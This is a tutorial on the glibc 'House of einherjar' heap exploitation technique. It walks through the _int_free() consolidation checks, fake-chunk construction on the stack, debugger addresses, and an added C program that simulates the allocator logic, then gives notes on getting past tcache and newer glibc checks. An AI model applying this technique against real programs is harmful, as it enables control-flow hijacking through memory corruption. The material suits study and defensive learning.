House of einherjar
- House of einherjar is a technique that abuses the backward consolidation done by _int_free(): by forging the header of a chunk that is about to be freed, the attacker makes the allocator merge it with a fake chunk at an address of their choosing and, because the next chunk is the top chunk, install that fake chunk as the new top.
- _int_free() first checks whether the chunk being freed is of fastbin size; if it is, it is placed in a fastbin and none of the steps below are taken.
- If it is not a fastbin chunk, _int_free() checks whether the chunk was obtained with mmap(); such chunks are simply unmapped.
- If the chunk was not obtained with mmap(), _int_free() takes the arena lock if it does not hold it already.
- _int_free() then checks that the pointer being freed is not the arena's top chunk ("double free or corruption (top)").
- Next it checks that the next chunk does not lie beyond the end of the top chunk ("double free or corruption (out)") and that the next chunk's PREV_INUSE bit is set, i.e. that the chunk being freed is still recorded as in use ("double free or corruption (!prev)").
- Then it checks that the size of the next chunk is neither smaller than the minimum chunk size nor larger than the arena's system_mem ("free(): invalid next size (normal)").
- These checks look only at the next chunk.
- _int_free() then looks at the PREV_INUSE flag of the chunk's "size" field.
- If the flag is clear, which means the previous chunk is free, the chunk's "prev_size" is added to the "size" variable.
- chunk_at_offset() is then called to move the pointer back by prev_size (the chunk's address minus prev_size), and the result is stored in the variable p.
- unlink() is then called to remove the chunk at p from its free list; it requires p->fd->bk == p and p->bk->fd == p.
- _int_free() then checks whether the next chunk is the top chunk.
- If the next chunk is the top chunk, the size of the top chunk is added to the size variable.
- The PREV_INUSE flag is set in that value.
- set_head() is called with p and the size to write the new chunk header.
- Finally p is stored in the arena's top (av->top = p), so p becomes the new top chunk.
- House of einherjar can be carried out when you can write a fake chunk somewhere in memory (here the stack) and modify the header of an in-use chunk.
- Write a fake free chunk on the stack and allocate two chunks of sizes that do not fall in the fastbins.
- Modify the header of the chunk that was allocated last:
- Clear the PREV_INUSE flag in its "size" field.
- Store in its "prev_size" the address of that chunk's header minus the address of the fake chunk (computed modulo 2^64, so the value wraps around when the fake chunk lies above the heap).
- The fake chunk must hold the following values:
- "prev_size": the size of the last allocated chunk.
- "size": the same value written into the last chunk's "prev_size" (chunk header address minus fake chunk address), so that the fake chunk's next chunk is the chunk being freed; "fd" and "bk": the address of the fake chunk itself, so that unlink()'s fd->bk == p and bk->fd == p checks pass.
- When the last chunk is freed, the fake chunk's address is stored in arena->top.
- The next memory allocation request then returns a pointer into the fake chunk.
- For example, allocate memory of sizes 0x70 and 0xf0 and write a fake chunk on the stack.
- Store 0x100 in the fake chunk's "prev_size", and in its "size" store the chunk's header address (0x602080) minus the fake chunk's address (0x7fffffffe430).
- In the chunk to be freed, clear the PREV_INUSE flag in "size" and store the fake chunk's "size" value in "prev_size".
- When that chunk is freed, the fake chunk becomes the top chunk.
- When memory is then requested, the allocation is served from the fake chunk's area.
- The example program does the following:
- Create a fake chunk on the stack and request allocations of sizes 0x70 and 0xf0.
- Change the header of the chunk that was allocated last and free that chunk.
- Request a new allocation and store data in the returned area.
- A breakpoint at 0x4007a7 is used to inspect the fake chunk and the header of the chunk about to be freed.
- It is also used to compare the top chunk before and after the chunk is freed.
- A breakpoint at 0x4007cb is used to confirm that the newly allocated area is usable.
- The address of the chunk to be freed is 0x602090 (its header is at 0x602080).
- The PREV_INUSE flag has been cleared in the chunk's "size" value.
- Its prev_size is 0xffff800000603c50, which is the header address of the chunk to be freed (0x602080) minus the address of the fake chunk (0x7fffffffe430), wrapped to 64 bits.
- The fake chunk's prev_size is 0x100 and its size is the same value as the prev_size of the chunk to be freed.
- Before free() was called the top chunk was at 0x602180; after the call the fake chunk at 0x7fffffffe430 became the top chunk.
- When memory is requested next, the allocator carves it out of the fake chunk and returns a pointer into it (0x7fffffffe440).
- Writing 16 'A' characters to that area works normally; the data lands on the stack.
- Only a few characters are written in this example, but writing more data into this area would overwrite the stack beyond the fake chunk and can change the program's control flow.
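The two procedures above, the _int_free() path and the fake-chunk setup, as one added example that is not the page's program: a re-implementation of the relevant part of glibc's _int_free() and of the split-from-top step of _int_malloc(), run over a heap, arena and fake chunk constructed inside the program rather than the real allocator, so the prev_size arithmetic (0x602080 - 0x7fffffffe430 = 0xffff800000603c50) and every check on the way can be executed and stepped through. The allocator names (chunksize, chunk_at_offset, prev_inuse) follow malloc.c; run_demo, model_int_free, model_malloc_from_top and einherjar_prev_size are this example's own, and a 64-bit build is assumed.

```c
/* House of einherjar, modelled: glibc's _int_free() backward-consolidation path and the
 * follow-up split from top, re-implemented over a private buffer so each check and the
 * header arithmetic can be run without the real heap (added example; 64-bit assumed). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
enum { SIZE_SZ = 8, MINSIZE = 0x20, MAX_FAST = 0x80, PREV_INUSE = 1, IS_MMAPPED = 2 };
typedef struct chunk {
    uint64_t prev_size, size;
    struct chunk *fd, *bk, *fd_nextsize, *bk_nextsize;
} chunk;
typedef struct { chunk *top; uint64_t system_mem; } arena;
static uint64_t chunksize(const chunk *p) { return p->size & ~7ULL; }
static int prev_inuse(const chunk *p) { return (int)(p->size & PREV_INUSE); }
/* glibc's chunk_at_offset(): raw address arithmetic, wrapping modulo 2^64 */
static chunk *chunk_at_offset(chunk *p, uint64_t off) {
    return (chunk *)(uintptr_t)((uint64_t)(uintptr_t)p + off);
}

/* prev_size that makes chunk_at_offset(victim, -prev_size) land on the fake chunk;
 * with the page's addresses 0x602080 - 0x7fffffffe430 = 0xffff800000603c50. */
uint64_t einherjar_prev_size(uint64_t victim_hdr, uint64_t fake) { return victim_hdr - fake; }

/* The part of _int_free() the technique goes through.  Returns NULL on success,
 * otherwise the message malloc_printerr() would abort with. */
const char *model_int_free(arena *av, chunk *p) {
    uint64_t size = chunksize(p);
    if (size <= MAX_FAST)     return "fastbin path (not modelled)";
    if (p->size & IS_MMAPPED) return "munmap_chunk path (not modelled)";
    if (p == av->top)         return "double free or corruption (top)";
    chunk *nextchunk = chunk_at_offset(p, size);
    if (nextchunk >= chunk_at_offset(av->top, chunksize(av->top))) return "double free or corruption (out)";
    if (!prev_inuse(nextchunk)) return "double free or corruption (!prev)";
    uint64_t nextsize = chunksize(nextchunk);
    if (nextchunk->size <= 2 * SIZE_SZ || nextsize >= av->system_mem) return "free(): invalid next size (normal)";
    if (!prev_inuse(p)) {                     /* PREV_INUSE clear: consolidate backward */
        uint64_t prevsize = p->prev_size;
        size += prevsize;
        p = chunk_at_offset(p, 0 - prevsize); /* attacker-chosen: lands on the fake chunk */
        if (chunksize(p) != prevsize)         /* check added in glibc 2.29 */
            return "corrupted size vs. prev_size while consolidating";
        /* unlink(): every check below is satisfied by the fake chunk's own fields */
        if (chunksize(p) != chunk_at_offset(p, chunksize(p))->prev_size) /* glibc >= 2.26 */
            return "corrupted size vs. prev_size";
        chunk *fd = p->fd, *bk = p->bk;
        if (fd->bk != p || bk->fd != p) return "corrupted double-linked list";
        if (p->fd_nextsize != NULL) return "corrupted double-linked list (not small)"; /* keep it NULL */
        fd->bk = bk; bk->fd = fd;
    }
    if (nextchunk != av->top) return "merge into unsorted bin (not modelled)";
    size += nextsize;
    p->size = size | PREV_INUSE;              /* set_head() */
    av->top = p;                              /* the fake chunk is now top */
    return NULL;
}

/* _int_malloc()'s "use top" path: carve nb bytes off av->top, return the user pointer. */
void *model_malloc_from_top(arena *av, uint64_t nb) {
    chunk *victim = av->top;
    uint64_t size = chunksize(victim);
    if (size < nb + MINSIZE) return NULL;
    chunk *remainder = chunk_at_offset(victim, nb);
    victim->size = nb | PREV_INUSE;
    remainder->size = (size - nb) | PREV_INUSE;
    av->top = remainder;
    return (char *)victim + 2 * SIZE_SZ;
}

typedef struct { const char *err; int ok; uint64_t fake, top_after, alloc; } demo_result;
static _Alignas(16) uint8_t heap[0x21000];   /* constructed heap: 0x80 chunk, 0x100 chunk, top */
/* The page's scenario: fake chunk in a local buffer (standing in for the stack), header
 * edits on the 0x100 chunk, free it, then allocate 0x30 from the new top. */
demo_result run_demo(int mismatch_fake_size) {
    _Alignas(16) uint8_t stack_region[0x40] = {0};
    chunk *fake = (chunk *)stack_region;
    memset(heap, 0, sizeof heap);
    chunk *victim = (chunk *)(heap + 0x80), *top = (chunk *)(heap + 0x180);
    ((chunk *)heap)->size = 0x80 | PREV_INUSE;         /* malloc(0x70) */
    victim->size = 0x100 | PREV_INUSE;                 /* malloc(0xf0), the chunk to free */
    top->size = (sizeof heap - 0x180) | PREV_INUSE;
    arena av = { top, sizeof heap };
    uint64_t prevsize = einherjar_prev_size((uint64_t)(uintptr_t)victim, (uint64_t)(uintptr_t)fake);
    victim->size &= ~PREV_INUSE; victim->prev_size = prevsize;   /* attacker's header edits */
    fake->prev_size = 0x100; fake->fd = fake->bk = fake;         /* fd->bk == p && bk->fd == p */
    fake->size = prevsize + (mismatch_fake_size ? 0x10 : 0);     /* must equal victim's prev_size */
    demo_result r = {0}; r.fake = (uint64_t)(uintptr_t)fake;
    r.err = model_int_free(&av, victim);
    r.top_after = (uint64_t)(uintptr_t)av.top;
    if (r.err == NULL) r.alloc = (uint64_t)(uintptr_t)model_malloc_from_top(&av, 0x30);
    r.ok = r.err == NULL && r.top_after == r.fake && r.alloc == r.fake + 0x10;
    return r;
}

int main(void) {
    demo_result r = run_demo(0);
    printf("%s; top == fake: %d; malloc(0x30) == fake + 0x10: %d; fake size off by 0x10: %s\n",
           r.err ? r.err : "freed", r.top_after == r.fake, r.alloc == r.fake + 0x10, run_demo(1).err);
    return r.ok ? 0 : 1;
}
```

run_demo(1) makes the fake chunk's size differ from the victim's prev_size by 0x10 to show which check rejects it. Two caveats when moving from the model to a real glibc: from glibc 2.26 a freed 0x100-byte chunk goes into tcache before _int_free() is reached, so the tcache bin for that size has to be filled first; and from glibc 2.29 _int_malloc() rejects a top chunk whose size exceeds av->system_mem ("malloc(): corrupted top size"), so a fake chunk far above the heap, as on the stack here, yields a merged top size that fails that check and the fake chunk has to sit at an address that keeps the merged size small.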